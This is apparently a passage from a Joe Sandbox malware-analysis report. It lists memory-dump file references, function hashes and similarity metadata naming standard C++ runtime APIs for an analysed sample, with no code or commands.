                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
                                                                                                                                                                                                                                          • Instruction ID: c95adac215bc5cca0506ef7b0c26774d34d25cf8979c41d5149a31ce75e40678
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CE08C32921268EBCB15DF98D90498AF3ECEB49B00B650096F901D3150C270DE00CBD4
                                                                                                                                                                                                                                          Function 00262EC0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 32384418-2793365725
                                                                                                                                                                                                                                          • Opcode ID: 5e8de039224b57483f75babc7716f28952e4bd9056623766967e0a5685436b20
                                                                                                                                                                                                                                          • Instruction ID: de4089cf581e5e79145c0f9cd60ce5ae1405010e3e8a5f1953a7e9882e6d18f5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8de039224b57483f75babc7716f28952e4bd9056623766967e0a5685436b20
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99A1D1B0A21206DFDB20DF74C844B9AB7B8FF15310F148169E819D7681EB31EA68CBD1
                                                                                                                                                                                                                                          Function 0027BB72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 531285432-2793365725
                                                                                                                                                                                                                                          • Opcode ID: 457e2736b55219dce51ba9c9c5fea4ce4a59201b47cda963f8a0f47458c0bf4d
                                                                                                                                                                                                                                          • Instruction ID: ce01dd7c2ccb0c5ca3eb3084e8809487f45db4fb1b39e7d421a1f5449e355e02
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 457e2736b55219dce51ba9c9c5fea4ce4a59201b47cda963f8a0f47458c0bf4d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85211D71A10119AFDF01EFA4DC859BEB7B9EF48710F20801AFA05B7251DB709D519BA1
                                                                                                                                                                                                                                          Function 00263AC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __Mtx_destroy_in_situ.LIBCPMT ref: 00263B93
                                                                                                                                                                                                                                          • __Cnd_destroy_in_situ.LIBCPMT ref: 00263B99
                                                                                                                                                                                                                                          • __Mtx_destroy_in_situ.LIBCPMT ref: 00263BA2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 3308344742-2793365725
                                                                                                                                                                                                                                          • Opcode ID: bc17cb825f0d02b7484cbfb6f066981d67fe6bf58c3eb36668729f9a9596e4d4
                                                                                                                                                                                                                                          • Instruction ID: 232fda086428efd4a9fd24e4870a79135470c8202dc7fb9dfaa89713d1f51149
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc17cb825f0d02b7484cbfb6f066981d67fe6bf58c3eb36668729f9a9596e4d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3351F371A10B05DFDB24DF28C884B6AB7E4EF05724F148A6EE41AC7790DB34AE50CB90
                                                                                                                                                                                                                                          Function 0027C452 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
